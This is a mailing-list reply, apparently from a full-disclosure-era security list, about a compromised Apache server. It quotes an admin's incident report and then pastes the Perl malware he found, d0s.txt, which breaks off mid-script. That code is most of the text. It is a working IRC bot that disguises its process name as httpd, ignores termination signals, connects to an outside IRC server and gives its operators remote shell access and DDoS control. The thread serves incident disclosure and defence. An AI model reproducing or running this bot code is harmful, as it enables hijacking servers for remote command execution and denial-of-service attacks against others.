Re: Apache hacks (./atac, d0s.txt)
Take a look at these links:
http://lists.virus.org/full-disclosure-0412/msg00541.html
http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html
Are your systems patched (apache) ? Do you run any
application that might be vulnerable?
One thing I know is that this perl script is crearly
made by some brazilian people..
--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com
--- Andrew Y Ng <ayn@xxxxxxxxxxxx> escreveu:
> My server has been seeing some usual activities
> today, I don't have much time
> to get down to the bottom of things, but after I
> investigated briefly I have
> decided to disable PERL executable permission for
> www-data (Apache process's
> user), also locked /var/tmp so www-data cannot write
> to it.
>
> Looks like it ignores all the `kill` signals, not
> sure how I can actually
> kill it...
>
>
> I found the included script in /var/tmp called
> d0s.txt.
>
> I found a bunch of processes called ./atac 20
> running, and found the
> following content in /tmp/atac:
>
> http://andrewng.com/tmp/atac.tbz
>
> here's d0s.txt:
>
> #!/usr/bin/perl
> ################ CONFIGURACAO
>
#################################################################
> my $processo = '/usr/local/apache/bin/httpd -DSSL';
> # Nome do processo que vai aparece no ps #
>
#----------------------------------------------################################################
> my $MODOME='+pi'; #
> Modo Do Bot #
>
>
#----------------------------------------------################################################
> my $linas_max='10'; #
> Evita o flood :) depois de X linhas #
>
#----------------------------------------------################################################
> my $sleep='3'; # ele
> dorme X segundos #
> ##################### IRC
>
#####################################################################
> my @adms=("DDOS"); # Nick do
> administrador #
>
#----------------------------------------------################################################
> my @canais=("#bots ddos");# Canais
> #
>
#----------------------------------------------################################################
> my $nick='b0t'; # Nick do
> bot. Caso esteja em uso vai aparecer #
> # #
> aparecer com numero radonamico no final #
>
#----------------------------------------------################################################
> my $ircname = 'b0t'; # User ID
> #
>
#----------------------------------------------################################################
> my $realname = '��4A�dmin�14: �4��#��D�D�OS��';
> #
>
#----------------------------------------------################################################
> $servidor='irc.gigachat.net' unless $servidor; #
> Servidor de irc que vai ser usado #
> # #
> caso não seja especificado no argumento #
>
#----------------------------------------------################################################
> my $porta='6667'; # Porta do
> servidor de irc #
> ################ ACESSO A SHELL
>
###############################################################
> my $secv = 1; # 1/0
> pra habilita/desabilita acesso a shell #
>
###############################################################################################
>
> my $VERSAO = '1.0';
>
> $SIG{'INT'} = 'IGNORE';
> $SIG{'HUP'} = 'IGNORE';
> $SIG{'TERM'} = 'IGNORE';
> $SIG{'CHLD'} = 'IGNORE';
> $SIG{'PS'} = 'IGNORE';
>
> use IO::Socket;
> use Socket;
> use IO::Select;
> chdir("/");
> $servidor="$ARGV[0]" if $ARGV[0];
> $0="$processo"."\0"x16;;
> my $pid=fork;
> exit if $pid;
> die "Problema com o fork: $!" unless defined($pid);
>
>
>
> our %irc_servers;
> our %DCC;
> my $dcc_sel = new IO::Select->new();
>
>
> $sel_cliente = IO::Select->new();
> sub sendraw {
> if ($#_ == '1') {
> my $socket = $_[0];
> print $socket "$_[1]\n";
> } else {
> print $IRC_cur_socket "$_[0]\n";
> }
> }
>
> sub conectar {
> my $meunick = $_[0];
> my $servidor_con = $_[1];
> my $porta_con = $_[2];
>
> my $IRC_socket =
> IO::Socket::INET->new(Proto=>"tcp",
> PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
> return(1);
> if (defined($IRC_socket)) {
> $IRC_cur_socket = $IRC_socket;
>
> $IRC_socket->autoflush(1);
> $sel_cliente->add($IRC_socket);
>
> $irc_servers{$IRC_cur_socket}{'host'} =
> "$servidor_con";
> $irc_servers{$IRC_cur_socket}{'porta'} =
> "$porta_con";
> $irc_servers{$IRC_cur_socket}{'nick'} =
> $meunick;
> $irc_servers{$IRC_cur_socket}{'meuip'} =
> $IRC_socket->sockhost;
> nick("$meunick");
> sendraw("USER $ircname
> ".$IRC_socket->sockhost." $servidor_con
> :$realname");
> sleep 1;
> }
>
> }
> my $line_temp;
> while( 1 ) {
> while (!(keys(%irc_servers))) { conectar("$nick",
> "$servidor", "$porta"); }
> delete($irc_servers{''}) if
> (defined($irc_servers{''}));
> &DCC::connections;
> my @ready = $sel_cliente->can_read(0);
> next unless(@ready);
> foreach $fh (@ready) {
> $IRC_cur_socket = $fh;
> $meunick =
> $irc_servers{$IRC_cur_socket}{'nick'};
> $nread = sysread($fh, $msg, 4096);
> if ($nread == 0) {
> $sel_cliente->remove($fh);
> $fh->close;
> delete($irc_servers{$fh});
> }
> @lines = split (/\n/, $msg);
>
> for(my $c=0; $c<= $#lines; $c++) {
> $line = $lines[$c];
> $line=$line_temp.$line if ($line_temp);
> $line_temp='';
> $line =~ s/\r$//;
> unless ($c == $#lines) {
> parse("$line");
> } else {
> if ($#lines == 0) {
> parse("$line");
> } elsif ($lines[$c] =~ /\r$/) {
> parse("$line");
> } elsif ($line =~ /^(\S+) NOTICE AUTH
> :\*\*\*/) {
> parse("$line");
> } else {
> $line_temp = $line;
> }
> }
> }
> }
> }
>
>
>
> sub parse {
> my $servarg = shift;
> if ($servarg =~ /^PING \:(.*)/) {
> sendraw("PONG :$1");
> } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
> PRIVMSG (.+?) \:(.+)/) {
> my $pn=$1; my $onde = $4; my $args = $5;
> if ($args =~ /^\001VERSION\001$/) {
> notice("$pn", "\001Bot powered by DDOS
> TEAM\001");
> }
> if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
> if ($onde eq "$meunick"){
> shell("$pn", "$args");
> }
> if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
> ) {
>
=== message truncated ===
Yahoo! Acesso Grátis - Internet rápida e grátis.
Instale o discador agora! http://br.acesso.yahoo.com/